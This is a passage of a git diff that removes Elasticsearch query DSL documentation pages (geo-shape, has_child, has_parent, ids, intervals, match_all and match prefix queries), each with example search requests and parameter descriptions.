This can be useful when -querying multiple indexes which might have different mappings. When set to -`false` (the default value) the query will throw an exception if the field -is not mapped. diff --git a/docs/reference/query-dsl/geo-queries.asciidoc b/docs/reference/query-dsl/geo-queries.asciidoc deleted file mode 100644 index b4eb86763e7..00000000000 --- a/docs/reference/query-dsl/geo-queries.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ -[[geo-queries]] -== Geo queries - -Elasticsearch supports two types of geo data: -<> fields which support lat/lon pairs, and -<> fields, which support points, -lines, circles, polygons, multi-polygons, etc. - -The queries in this group are: - -<> query:: -Finds documents with geo-points that fall into the specified rectangle. - -<> query:: -Finds documents with geo-points within the specified distance of a central point. - -<> query:: -Find documents with geo-points within the specified polygon. - -<> query:: -Finds documents with: -* `geo-shapes` which either intersect, are contained by, or do not intersect -with the specified geo-shape -* `geo-points` which intersect the specified -geo-shape - -include::geo-bounding-box-query.asciidoc[] - -include::geo-distance-query.asciidoc[] - -include::geo-polygon-query.asciidoc[] - -include::geo-shape-query.asciidoc[] diff --git a/docs/reference/query-dsl/geo-shape-query.asciidoc b/docs/reference/query-dsl/geo-shape-query.asciidoc deleted file mode 100644 index 65792479a83..00000000000 --- a/docs/reference/query-dsl/geo-shape-query.asciidoc +++ /dev/null @@ -1,317 +0,0 @@ -[[query-dsl-geo-shape-query]] -=== Geo-shape query -++++ -Geo-shape -++++ - -Filter documents indexed using the `geo_shape` or `geo_point` type. - -Requires the <> or the -<>. - -The `geo_shape` query uses the same grid square representation as the -`geo_shape` mapping to find documents that have a shape that intersects -with the query shape. It will also use the same Prefix Tree configuration -as defined for the field mapping. - -The query supports two ways of defining the query shape, either by -providing a whole shape definition, or by referencing the name of a shape -pre-indexed in another index. Both formats are defined below with -examples. - - -==== Inline Shape Definition - -Similar to the `geo_shape` type, the `geo_shape` query uses -http://geojson.org[GeoJSON] to represent shapes. - -Given the following index with locations as `geo_shape` fields: - -[source,console] --------------------------------------------------- -PUT /example -{ - "mappings": { - "properties": { - "location": { - "type": "geo_shape" - } - } - } -} - -POST /example/_doc?refresh -{ - "name": "Wind & Wetter, Berlin, Germany", - "location": { - "type": "point", - "coordinates": [ 13.400544, 52.530286 ] - } -} --------------------------------------------------- -// TESTSETUP - - -The following query will find the point using {es}'s `envelope` GeoJSON -extension: - -[source,console] --------------------------------------------------- -GET /example/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_shape": { - "location": { - "shape": { - "type": "envelope", - "coordinates": [ [ 13.0, 53.0 ], [ 14.0, 52.0 ] ] - }, - "relation": "within" - } - } - } - } - } -} --------------------------------------------------- - - -The above query can, similarly, be queried on `geo_point` fields. 
- -[source,console] --------------------------------------------------- -PUT /example_points -{ - "mappings": { - "properties": { - "location": { - "type": "geo_point" - } - } - } -} - -PUT /example_points/_doc/1?refresh -{ - "name": "Wind & Wetter, Berlin, Germany", - "location": [13.400544, 52.530286] -} --------------------------------------------------- -// TEST[continued] - - -Using the same query, the documents with matching `geo_point` fields are -returned. - -[source,console] --------------------------------------------------- -GET /example_points/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_shape": { - "location": { - "shape": { - "type": "envelope", - "coordinates": [ [ 13.0, 53.0 ], [ 14.0, 52.0 ] ] - }, - "relation": "intersects" - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "took" : 17, - "timed_out" : false, - "_shards" : { - "total" : 1, - "successful" : 1, - "skipped" : 0, - "failed" : 0 - }, - "hits" : { - "total" : { - "value" : 1, - "relation" : "eq" - }, - "max_score" : 1.0, - "hits" : [ - { - "_index" : "example_points", - "_type" : "_doc", - "_id" : "1", - "_score" : 1.0, - "_source" : { - "name": "Wind & Wetter, Berlin, Germany", - "location": [13.400544, 52.530286] - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took" : 17/"took" : $body.took/] - - -==== Pre-Indexed Shape - -The query also supports using a shape which has already been indexed in another -index. This is particularly useful for when you have a pre-defined list of -shapes and you want to reference the list using -a logical name (for example 'New Zealand') rather than having to provide -coordinates each time. In this situation, it is only necessary to provide: - -* `id` - The ID of the document that containing the pre-indexed shape. -* `index` - Name of the index where the pre-indexed shape is. Defaults to -'shapes'. -* `path` - The field specified as path containing the pre-indexed shape. -Defaults to 'shape'. -* `routing` - The routing of the shape document if required. - -The following is an example of using the Filter with a pre-indexed -shape: - -[source,console] --------------------------------------------------- -PUT /shapes -{ - "mappings": { - "properties": { - "location": { - "type": "geo_shape" - } - } - } -} - -PUT /shapes/_doc/deu -{ - "location": { - "type": "envelope", - "coordinates" : [[13.0, 53.0], [14.0, 52.0]] - } -} - -GET /example/_search -{ - "query": { - "bool": { - "filter": { - "geo_shape": { - "location": { - "indexed_shape": { - "index": "shapes", - "id": "deu", - "path": "location" - } - } - } - } - } - } -} --------------------------------------------------- - - -==== Spatial Relations - -The <> mapping parameter determines which -spatial relation operators may be used at search time. - -The following is a complete list of spatial relation operators available when -searching a field of type `geo_shape`: - -* `INTERSECTS` - (default) Return all documents whose `geo_shape` field -intersects the query geometry. -* `DISJOINT` - Return all documents whose `geo_shape` field has nothing in -common with the query geometry. -* `WITHIN` - Return all documents whose `geo_shape` field is within the query -geometry. -* `CONTAINS` - Return all documents whose `geo_shape` field contains the query -geometry. 
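For illustration, the `relation` parameter selects one of these operators at search time. The following sketch reuses the `example` index and `location` field from the snippets above and returns documents whose shapes are disjoint from the envelope:

[source,console]
--------------------------------------------------
GET /example/_search
{
  "query": {
    "geo_shape": {
      "location": {
        "shape": {
          "type": "envelope",
          "coordinates": [ [ 13.0, 53.0 ], [ 14.0, 52.0 ] ]
        },
        "relation": "disjoint" <1>
      }
    }
  }
}
--------------------------------------------------

<1> Any of the operators listed above can be supplied here; `disjoint` is only an example.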
- -When searching a field of type `geo_point` there is a single supported spatial -relation operator: - -* `INTERSECTS` - (default) Return all documents whose `geo_point` field -intersects the query geometry. - - -[discrete] -==== Ignore Unmapped - -When set to `true` the `ignore_unmapped` option will ignore an unmapped field -and will not match any documents for this query. This can be useful when -querying multiple indexes which might have different mappings. When set to -`false` (the default value) the query will throw an exception if the field -is not mapped. - - -==== Shape Types supported for Geo-Point - -When searching a field of type `geo_point` the following shape types are not -supported: - -* `POINT` -* `LINE` -* `MULTIPOINT` -* `MULTILINE` - -[[geo-shape-query-notes]] -==== Notes - -* Geo-shape queries on geo-shapes implemented with - <> will not be executed if - <> is set - to false. - - -* When data is indexed in a `geo_shape` field as an array of shapes, the arrays - are treated as one shape. For this reason, the following requests are - equivalent. - -[source,console] --------------------------------------------------- -PUT /test/_doc/1 -{ - "location": [ - { - "coordinates": [46.25,20.14], - "type": "point" - }, - { - "coordinates": [47.49,19.04], - "type": "point" - } - ] -} --------------------------------------------------- - - -[source,console] --------------------------------------------------- -PUT /test/_doc/1 -{ - "location": - { - "coordinates": [[46.25,20.14],[47.49,19.04]], - "type": "multipoint" - } -} --------------------------------------------------- diff --git a/docs/reference/query-dsl/has-child-query.asciidoc b/docs/reference/query-dsl/has-child-query.asciidoc deleted file mode 100644 index 7b8158aaab5..00000000000 --- a/docs/reference/query-dsl/has-child-query.asciidoc +++ /dev/null @@ -1,158 +0,0 @@ -[[query-dsl-has-child-query]] -=== Has child query -++++ -Has child -++++ - -Returns parent documents whose <> child documents match a -provided query. You can create parent-child relationships between documents in -the same index using a <> field mapping. - -[WARNING] -==== -Because it performs a join, the `has_child` is slow compared to other queries. -Its performance degrades as the number of matching child documents pointing to -unique parent documents increases. Each `has_child` query in a search can -increase query time significantly. - -If you care about query performance, do not use this query. If you need to use -the `has_child` query, use it as rarely as possible. -==== - -[[has-child-query-ex-request]] -==== Example request - -[[has-child-index-setup]] -===== Index setup -To use the `has_child` query, your index must include a <> -field mapping. For example: - -[source,console] ----- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "my-join-field": { - "type": "join", - "relations": { - "parent": "child" - } - } - } - } -} - ----- -// TESTSETUP - -[[has-child-query-ex-query]] -===== Example query - -[source,console] ----- -GET /_search -{ - "query": { - "has_child": { - "type": "child", - "query": { - "match_all": {} - }, - "max_children": 10, - "min_children": 2, - "score_mode": "min" - } - } -} ----- - -[[has-child-top-level-params]] -==== Top-level parameters for `has_child` - -`type`:: -(Required, string) Name of the child relationship mapped for the -<> field. - -`query`:: -(Required, query object) Query you wish to run on child documents of the `type` -field. 
If a child document matches the search, the query returns the parent -document. - -`ignore_unmapped`:: -+ --- -(Optional, Boolean) Indicates whether to ignore an unmapped `type` and not -return any documents instead of an error. Defaults to `false`. - -If `false`, {es} returns an error if the `type` is unmapped. - -You can use this parameter to query multiple indices that may not contain the -`type`. --- - -`max_children`:: -(Optional, integer) Maximum number of child documents that match the `query` -allowed for a returned parent document. If the parent document exceeds this -limit, it is excluded from the search results. - -`min_children`:: -(Optional, integer) Minimum number of child documents that match the `query` -required to match the query for a returned parent document. If the parent -document does not meet this limit, it is excluded from the search results. - -`score_mode`:: -+ --- -(Optional, string) Indicates how scores for matching child documents affect the -root parent document's <>. Valid values -are: - -`none` (Default):: -Do not use the relevance scores of matching child documents. The query assigns -parent documents a score of `0`. - -`avg`:: -Use the mean relevance score of all matching child documents. - -`max`:: -Uses the highest relevance score of all matching child documents. - -`min`:: -Uses the lowest relevance score of all matching child documents. - -`sum`:: -Add together the relevance scores of all matching child documents. --- - -[[has-child-query-notes]] -==== Notes - -[[has-child-query-performance]] -===== Sorting -You cannot sort the results of a `has_child` query using standard -<>. - -If you need to sort returned documents by a field in their child documents, use -a `function_score` query and sort by `_score`. For example, the following query -sorts returned documents by the `click_count` field of their child documents. - -[source,console] ----- -GET /_search -{ - "query": { - "has_child": { - "type": "child", - "query": { - "function_score": { - "script_score": { - "script": "_score * doc['click_count'].value" - } - } - }, - "score_mode": "max" - } - } -} ----- diff --git a/docs/reference/query-dsl/has-parent-query.asciidoc b/docs/reference/query-dsl/has-parent-query.asciidoc deleted file mode 100644 index 6c4148a8dad..00000000000 --- a/docs/reference/query-dsl/has-parent-query.asciidoc +++ /dev/null @@ -1,139 +0,0 @@ -[[query-dsl-has-parent-query]] -=== Has parent query -++++ -Has parent -++++ - -Returns child documents whose <> parent document matches a -provided query. You can create parent-child relationships between documents in -the same index using a <> field mapping. - -[WARNING] -==== -Because it performs a join, the `has_parent` query is slow compared to other queries. -Its performance degrades as the number of matching parent documents increases. -Each `has_parent` query in a search can increase query time significantly. -==== - -[[has-parent-query-ex-request]] -==== Example request - -[[has-parent-index-setup]] -===== Index setup -To use the `has_parent` query, your index must include a <> -field mapping. 
For example: - -[source,console] ----- -PUT /my-index-000001 -{ - "mappings": { - "properties": { - "my-join-field": { - "type": "join", - "relations": { - "parent": "child" - } - }, - "tag": { - "type": "keyword" - } - } - } -} - ----- -// TESTSETUP - -[[has-parent-query-ex-query]] -===== Example query - -[source,console] ----- -GET /my-index-000001/_search -{ - "query": { - "has_parent": { - "parent_type": "parent", - "query": { - "term": { - "tag": { - "value": "Elasticsearch" - } - } - } - } - } -} ----- - -[[has-parent-top-level-params]] -==== Top-level parameters for `has_parent` - -`parent_type`:: -(Required, string) Name of the parent relationship mapped for the -<> field. - -`query`:: -(Required, query object) Query you wish to run on parent documents of the -`parent_type` field. If a parent document matches the search, the query returns -its child documents. - -`score`:: -+ --- -(Optional, Boolean) Indicates whether the <> of a matching parent document is aggregated into its child documents. -Defaults to `false`. - -If `false`, {es} ignores the relevance score of the parent document. {es} also -assigns each child document a relevance score equal to the `query`'s `boost`, -which defaults to `1`. - -If `true`, the relevance score of the matching parent document is aggregated -into its child documents' relevance scores. --- - -`ignore_unmapped`:: -+ --- -(Optional, Boolean) Indicates whether to ignore an unmapped `parent_type` and -not return any documents instead of an error. Defaults to `false`. - -If `false`, {es} returns an error if the `parent_type` is unmapped. - -You can use this parameter to query multiple indices that may not contain the -`parent_type`. --- - -[[has-parent-query-notes]] -==== Notes - -[[has-parent-query-performance]] -===== Sorting -You cannot sort the results of a `has_parent` query using standard -<>. - -If you need to sort returned documents by a field in their parent documents, use -a `function_score` query and sort by `_score`. For example, the following query -sorts returned documents by the `view_count` field of their parent documents. - -[source,console] ----- -GET /_search -{ - "query": { - "has_parent": { - "parent_type": "parent", - "score": true, - "query": { - "function_score": { - "script_score": { - "script": "_score * doc['view_count'].value" - } - } - } - } - } -} ----- diff --git a/docs/reference/query-dsl/ids-query.asciidoc b/docs/reference/query-dsl/ids-query.asciidoc deleted file mode 100644 index cf7ad4d8c10..00000000000 --- a/docs/reference/query-dsl/ids-query.asciidoc +++ /dev/null @@ -1,28 +0,0 @@ -[[query-dsl-ids-query]] -=== IDs -++++ -IDs -++++ - -Returns documents based on their IDs. This query uses document IDs stored in -the <> field. - -==== Example request - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "ids" : { - "values" : ["1", "4", "100"] - } - } -} --------------------------------------------------- - -[[ids-query-top-level-parameters]] -==== Top-level parameters for `ids` - -`values`:: -(Required, array of strings) An array of <>. \ No newline at end of file diff --git a/docs/reference/query-dsl/intervals-query.asciidoc b/docs/reference/query-dsl/intervals-query.asciidoc deleted file mode 100644 index b408e04a6b8..00000000000 --- a/docs/reference/query-dsl/intervals-query.asciidoc +++ /dev/null @@ -1,464 +0,0 @@ -[[query-dsl-intervals-query]] -=== Intervals query -++++ -Intervals -++++ - -Returns documents based on the order and proximity of matching terms. 
- -The `intervals` query uses *matching rules*, constructed from a small set of -definitions. These rules are then applied to terms from a specified `field`. - -The definitions produce sequences of minimal intervals that span terms in a -body of text. These intervals can be further combined and filtered by -parent sources. - - -[[intervals-query-ex-request]] -==== Example request - -The following `intervals` search returns documents containing `my -favorite food` immediately followed by `hot water` or `cold porridge` in the -`my_text` field. - -This search would match a `my_text` value of `my favorite food is cold -porridge` but not `when it's cold my favorite food is porridge`. - -[source,console] --------------------------------------------------- -POST _search -{ - "query": { - "intervals" : { - "my_text" : { - "all_of" : { - "ordered" : true, - "intervals" : [ - { - "match" : { - "query" : "my favorite food", - "max_gaps" : 0, - "ordered" : true - } - }, - { - "any_of" : { - "intervals" : [ - { "match" : { "query" : "hot water" } }, - { "match" : { "query" : "cold porridge" } } - ] - } - } - ] - } - } - } - } -} --------------------------------------------------- - -[[intervals-top-level-params]] -==== Top-level parameters for `intervals` -[[intervals-rules]] -``:: -+ --- -(Required, rule object) Field you wish to search. - -The value of this parameter is a rule object used to match documents -based on matching terms, order, and proximity. - -Valid rules include: - -* <> -* <> -* <> -* <> -* <> -* <> --- - -[[intervals-match]] -==== `match` rule parameters - -The `match` rule matches analyzed text. - -`query`:: -(Required, string) Text you wish to find in the provided ``. - -`max_gaps`:: -+ --- -(Optional, integer) Maximum number of positions between the matching terms. -Terms further apart than this are not considered matches. Defaults to -`-1`. - -If unspecified or set to `-1`, there is no width restriction on the match. If -set to `0`, the terms must appear next to each other. --- - -`ordered`:: -(Optional, Boolean) -If `true`, matching terms must appear in their specified order. Defaults to -`false`. - -`analyzer`:: -(Optional, string) <> used to analyze terms in the `query`. -Defaults to the top-level ``'s analyzer. - -`filter`:: -(Optional, <> rule object) An optional interval -filter. - -`use_field`:: -(Optional, string) If specified, then match intervals from this -field rather than the top-level ``. Terms are analyzed using the -search analyzer from this field. This allows you to search across multiple -fields as if they were all the same field; for example, you could index the same -text into stemmed and unstemmed fields, and search for stemmed tokens near -unstemmed ones. - -[[intervals-prefix]] -==== `prefix` rule parameters - -The `prefix` rule matches terms that start with a specified set of characters. -This prefix can expand to match at most 128 terms. If the prefix matches more -than 128 terms, {es} returns an error. You can use the -<> option in the field mapping to avoid this -limit. - -`prefix`:: -(Required, string) Beginning characters of terms you wish to find in the -top-level ``. - -`analyzer`:: -(Optional, string) <> used to normalize the `prefix`. -Defaults to the top-level ``'s analyzer. - -`use_field`:: -+ --- -(Optional, string) If specified, then match intervals from this field rather -than the top-level ``. - -The `prefix` is normalized using the search analyzer from this field, unless a -separate `analyzer` is specified. 
--- - -[[intervals-wildcard]] -==== `wildcard` rule parameters - -The `wildcard` rule matches terms using a wildcard pattern. This pattern can -expand to match at most 128 terms. If the pattern matches more than 128 terms, -{es} returns an error. - -`pattern`:: -(Required, string) Wildcard pattern used to find matching terms. -+ --- -This parameter supports two wildcard operators: - -* `?`, which matches any single character -* `*`, which can match zero or more characters, including an empty one - -WARNING: Avoid beginning patterns with `*` or `?`. This can increase -the iterations needed to find matching terms and slow search performance. --- -`analyzer`:: -(Optional, string) <> used to normalize the `pattern`. -Defaults to the top-level ``'s analyzer. - -`use_field`:: -+ --- -(Optional, string) If specified, match intervals from this field rather than the -top-level ``. - -The `pattern` is normalized using the search analyzer from this field, unless -`analyzer` is specified separately. --- - -[[intervals-fuzzy]] -==== `fuzzy` rule parameters - -The `fuzzy` rule matches terms that are similar to the provided term, within an -edit distance defined by <>. If the fuzzy expansion matches more than -128 terms, {es} returns an error. - -`term`:: -(Required, string) The term to match - -`prefix_length`:: -(Optional, string) Number of beginning characters left unchanged when creating -expansions. Defaults to `0`. - -`transpositions`:: -(Optional, Boolean) Indicates whether edits include transpositions of two -adjacent characters (ab → ba). Defaults to `true`. - -`fuzziness`:: -(Optional, string) Maximum edit distance allowed for matching. See <> -for valid values and more information. Defaults to `auto`. - -`analyzer`:: -(Optional, string) <> used to normalize the `term`. -Defaults to the top-level `` 's analyzer. - -`use_field`:: -+ --- -(Optional, string) If specified, match intervals from this field rather than the -top-level ``. - -The `term` is normalized using the search analyzer from this field, unless -`analyzer` is specified separately. --- - -[[intervals-all_of]] -==== `all_of` rule parameters - -The `all_of` rule returns matches that span a combination of other rules. - -`intervals`:: -(Required, array of rule objects) An array of rules to combine. All rules must -produce a match in a document for the overall source to match. - -`max_gaps`:: -+ --- -(Optional, integer) Maximum number of positions between the matching terms. -Intervals produced by the rules further apart than this are not considered -matches. Defaults to `-1`. - -If unspecified or set to `-1`, there is no width restriction on the match. If -set to `0`, the terms must appear next to each other. --- - -`ordered`:: -(Optional, Boolean) If `true`, intervals produced by the rules should appear in -the order in which they are specified. Defaults to `false`. - -`filter`:: -(Optional, <> rule object) Rule used to filter -returned intervals. - -[[intervals-any_of]] -==== `any_of` rule parameters - -The `any_of` rule returns intervals produced by any of its sub-rules. - -`intervals`:: -(Required, array of rule objects) An array of rules to match. - -`filter`:: -(Optional, <> rule object) Rule used to filter -returned intervals. - -[[interval_filter]] -==== `filter` rule parameters - -The `filter` rule returns intervals based on a query. See -<> for an example. - -`after`:: -(Optional, query object) Query used to return intervals that follow an interval -from the `filter` rule. 
- -`before`:: -(Optional, query object) Query used to return intervals that occur before an -interval from the `filter` rule. - -`contained_by`:: -(Optional, query object) Query used to return intervals contained by an interval -from the `filter` rule. - -`containing`:: -(Optional, query object) Query used to return intervals that contain an interval -from the `filter` rule. - -`not_contained_by`:: -(Optional, query object) Query used to return intervals that are *not* -contained by an interval from the `filter` rule. - -`not_containing`:: -(Optional, query object) Query used to return intervals that do *not* contain -an interval from the `filter` rule. - -`not_overlapping`:: -(Optional, query object) Query used to return intervals that do *not* overlap -with an interval from the `filter` rule. - -`overlapping`:: -(Optional, query object) Query used to return intervals that overlap with an -interval from the `filter` rule. - -`script`:: -(Optional, <>) Script used to return -matching documents. This script must return a boolean value, `true` or `false`. -See <> for an example. - - -[[intervals-query-note]] -==== Notes - -[[interval-filter-rule-ex]] -===== Filter example - -The following search includes a `filter` rule. It returns documents that have -the words `hot` and `porridge` within 10 positions of each other, without the -word `salty` in between: - -[source,console] --------------------------------------------------- -POST _search -{ - "query": { - "intervals" : { - "my_text" : { - "match" : { - "query" : "hot porridge", - "max_gaps" : 10, - "filter" : { - "not_containing" : { - "match" : { - "query" : "salty" - } - } - } - } - } - } - } -} --------------------------------------------------- - -[[interval-script-filter]] -===== Script filters - -You can use a script to filter intervals based on their start position, end -position, and internal gap count. The following `filter` script uses the -`interval` variable with the `start`, `end`, and `gaps` methods: - -[source,console] --------------------------------------------------- -POST _search -{ - "query": { - "intervals" : { - "my_text" : { - "match" : { - "query" : "hot porridge", - "filter" : { - "script" : { - "source" : "interval.start > 10 && interval.end < 20 && interval.gaps == 0" - } - } - } - } - } - } -} --------------------------------------------------- - - -[[interval-minimization]] -===== Minimization - -The intervals query always minimizes intervals, to ensure that queries can -run in linear time. This can sometimes cause surprising results, particularly -when using `max_gaps` restrictions or filters. For example, take the -following query, searching for `salty` contained within the phrase `hot -porridge`: - -[source,console] --------------------------------------------------- -POST _search -{ - "query": { - "intervals" : { - "my_text" : { - "match" : { - "query" : "salty", - "filter" : { - "contained_by" : { - "match" : { - "query" : "hot porridge" - } - } - } - } - } - } - } -} --------------------------------------------------- - -This query does *not* match a document containing the phrase `hot porridge is -salty porridge`, because the intervals returned by the match query for `hot -porridge` only cover the initial two terms in this document, and these do not -overlap the intervals covering `salty`. - -Another restriction to be aware of is the case of `any_of` rules that contain -sub-rules which overlap. 
In particular, if one of the rules is a strict -prefix of the other, then the longer rule can never match, which can -cause surprises when used in combination with `max_gaps`. Consider the -following query, searching for `the` immediately followed by `big` or `big bad`, -immediately followed by `wolf`: - -[source,console] --------------------------------------------------- -POST _search -{ - "query": { - "intervals" : { - "my_text" : { - "all_of" : { - "intervals" : [ - { "match" : { "query" : "the" } }, - { "any_of" : { - "intervals" : [ - { "match" : { "query" : "big" } }, - { "match" : { "query" : "big bad" } } - ] } }, - { "match" : { "query" : "wolf" } } - ], - "max_gaps" : 0, - "ordered" : true - } - } - } - } -} --------------------------------------------------- - -Counter-intuitively, this query does *not* match the document `the big bad -wolf`, because the `any_of` rule in the middle only produces intervals -for `big` - intervals for `big bad` being longer than those for `big`, while -starting at the same position, and so being minimized away. In these cases, -it's better to rewrite the query so that all of the options are explicitly -laid out at the top level: - -[source,console] --------------------------------------------------- -POST _search -{ - "query": { - "intervals" : { - "my_text" : { - "any_of" : { - "intervals" : [ - { "match" : { - "query" : "the big bad wolf", - "ordered" : true, - "max_gaps" : 0 } }, - { "match" : { - "query" : "the big wolf", - "ordered" : true, - "max_gaps" : 0 } } - ] - } - } - } - } -} --------------------------------------------------- diff --git a/docs/reference/query-dsl/joining-queries.asciidoc b/docs/reference/query-dsl/joining-queries.asciidoc deleted file mode 100644 index f10c2bda603..00000000000 --- a/docs/reference/query-dsl/joining-queries.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ -[[joining-queries]] -== Joining queries - -Performing full SQL-style joins in a distributed system like Elasticsearch is -prohibitively expensive. Instead, Elasticsearch offers two forms of join -which are designed to scale horizontally. - -<>:: -Documents may contain fields of type <>. These -fields are used to index arrays of objects, where each object can be queried -(with the `nested` query) as an independent document. - -<> and <> queries:: -A <> can exist between -documents within a single index. The `has_child` query returns parent -documents whose child documents match the specified query, while the -`has_parent` query returns child documents whose parent document matches the -specified query. - -Also see the <> in the `terms` -query, which allows you to build a `terms` query from values contained in -another document. - -[discrete] -[[joining-queries-notes]] -==== Notes - -[discrete] -===== Allow expensive queries -Joining queries will not be executed if <> -is set to false. - -include::nested-query.asciidoc[] - -include::has-child-query.asciidoc[] - -include::has-parent-query.asciidoc[] - -include::parent-id-query.asciidoc[] - - diff --git a/docs/reference/query-dsl/match-all-query.asciidoc b/docs/reference/query-dsl/match-all-query.asciidoc deleted file mode 100644 index 6c77e4b83fd..00000000000 --- a/docs/reference/query-dsl/match-all-query.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[[query-dsl-match-all-query]] -== Match all query -++++ -Match all -++++ - -The most simple query, which matches all documents, giving them all a `_score` -of `1.0`. 
- -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match_all": {} - } -} --------------------------------------------------- - -The `_score` can be changed with the `boost` parameter: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match_all": { "boost" : 1.2 } - } -} --------------------------------------------------- - -[[query-dsl-match-none-query]] -[discrete] -== Match None Query - -This is the inverse of the `match_all` query, which matches no documents. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match_none": {} - } -} --------------------------------------------------- diff --git a/docs/reference/query-dsl/match-bool-prefix-query.asciidoc b/docs/reference/query-dsl/match-bool-prefix-query.asciidoc deleted file mode 100644 index 6d59e9a6df2..00000000000 --- a/docs/reference/query-dsl/match-bool-prefix-query.asciidoc +++ /dev/null @@ -1,85 +0,0 @@ -[[query-dsl-match-bool-prefix-query]] -=== Match boolean prefix query -++++ -Match boolean prefix -++++ - -A `match_bool_prefix` query analyzes its input and constructs a -<> from the terms. Each term except the last -is used in a `term` query. The last term is used in a `prefix` query. A -`match_bool_prefix` query such as - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match_bool_prefix" : { - "message" : "quick brown f" - } - } -} --------------------------------------------------- - -where analysis produces the terms `quick`, `brown`, and `f` is similar to the -following `bool` query - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "bool" : { - "should": [ - { "term": { "message": "quick" }}, - { "term": { "message": "brown" }}, - { "prefix": { "message": "f"}} - ] - } - } -} --------------------------------------------------- - -An important difference between the `match_bool_prefix` query and -<> is that the -`match_phrase_prefix` query matches its terms as a phrase, but the -`match_bool_prefix` query can match its terms in any position. The example -`match_bool_prefix` query above could match a field containing -`quick brown fox`, but it could also match `brown fox quick`. It could also -match a field containing the term `quick`, the term `brown` and a term -starting with `f`, appearing in any position. - -==== Parameters - -By default, `match_bool_prefix` queries' input text will be analyzed using the -analyzer from the queried field's mapping. A different search analyzer can be -configured with the `analyzer` parameter - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match_bool_prefix": { - "message": { - "query": "quick brown f", - "analyzer": "keyword" - } - } - } -} --------------------------------------------------- - -`match_bool_prefix` queries support the -<> and `operator` -parameters as described for the -<>, applying the setting to the -constructed `bool` query. The number of clauses in the constructed `bool` -query will in most cases be the number of terms produced by analysis of the -query text. - -The <>, `prefix_length`, -`max_expansions`, `fuzzy_transpositions`, and `fuzzy_rewrite` parameters can -be applied to the `term` subqueries constructed for all terms but the final -term. They do not have any effect on the prefix query constructed for the -final term. 
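For illustration, a sketch that combines several of these parameters in one request (the `message` field and the values are only examples):

[source,console]
--------------------------------------------------
GET /_search
{
  "query": {
    "match_bool_prefix": {
      "message": {
        "query": "quick brown f",
        "fuzziness": "AUTO", <1>
        "prefix_length": 1
      }
    }
  }
}
--------------------------------------------------

<1> `fuzziness` and `prefix_length` affect only the `term` subqueries built for `quick` and `brown`, not the `prefix` query built for the final term `f`.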
diff --git a/docs/reference/query-dsl/match-phrase-prefix-query.asciidoc b/docs/reference/query-dsl/match-phrase-prefix-query.asciidoc deleted file mode 100644 index 04b757ba901..00000000000 --- a/docs/reference/query-dsl/match-phrase-prefix-query.asciidoc +++ /dev/null @@ -1,103 +0,0 @@ -[[query-dsl-match-query-phrase-prefix]] -=== Match phrase prefix query -++++ -Match phrase prefix -++++ - -Returns documents that contain the words of a provided text, in the **same -order** as provided. The last term of the provided text is treated as a -<>, matching any words that begin with that term. - - -[[match-phrase-prefix-query-ex-request]] -==== Example request - -The following search returns documents that contain phrases beginning with -`quick brown f` in the `message` field. - -This search would match a `message` value of `quick brown fox` or `two quick -brown ferrets` but not `the fox is quick and brown`. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "match_phrase_prefix": { - "message": { - "query": "quick brown f" - } - } - } -} --------------------------------------------------- - - -[[match-phrase-prefix-top-level-params]] -==== Top-level parameters for `match_phrase_prefix` -``:: -(Required, object) Field you wish to search. - -[[match-phrase-prefix-field-params]] -==== Parameters for `` -`query`:: -+ --- -(Required, string) Text you wish to find in the provided ``. - -The `match_phrase_prefix` query <> any provided text into -tokens before performing a search. The last term of this text is treated as a -<>, matching any words that begin with that term. --- - -`analyzer`:: -(Optional, string) <> used to convert text in the `query` -value into tokens. Defaults to the <> mapped for the ``. If no analyzer is mapped, the index's -default analyzer is used. - -`max_expansions`:: -(Optional, integer) Maximum number of terms to which the last provided term of -the `query` value will expand. Defaults to `50`. - -`slop`:: -(Optional, integer) Maximum number of positions allowed between matching tokens. -Defaults to `0`. Transposed terms have a slop of `2`. - -`zero_terms_query`:: -+ --- -(Optional, string) Indicates whether no documents are returned if the `analyzer` -removes all tokens, such as when using a `stop` filter. Valid values are: - - `none` (Default):: -No documents are returned if the `analyzer` removes all tokens. - - `all`:: -Returns all documents, similar to a <> -query. --- - - -[[match-phrase-prefix-query-notes]] -==== Notes - -[[match-phrase-prefix-autocomplete]] -===== Using the match phrase prefix query for search autocompletion -While easy to set up, using the `match_phrase_prefix` query for search -autocompletion can sometimes produce confusing results. - -For example, consider the query string `quick brown f`. This query works by -creating a phrase query out of `quick` and `brown` (i.e. the term `quick` must -exist and must be followed by the term `brown`). Then it looks at the sorted -term dictionary to find the first 50 terms that begin with `f`, and adds these -terms to the phrase query. - -The problem is that the first 50 terms may not include the term `fox` so the -phrase `quick brown fox` will not be found. This usually isn't a problem as -the user will continue to type more letters until the word they are looking -for appears. - -For better solutions for _search-as-you-type_ see the -<> and -the <>. 
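For illustration, a sketch that applies the `max_expansions` and `slop` parameters described above (the `message` field and the values are only examples):

[source,console]
--------------------------------------------------
GET /_search
{
  "query": {
    "match_phrase_prefix": {
      "message": {
        "query": "quick brown f",
        "max_expansions": 10, <1>
        "slop": 2
      }
    }
  }
}
--------------------------------------------------

<1> Only the last term, `f`, is expanded; `slop` controls how far apart the matched tokens may appear.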
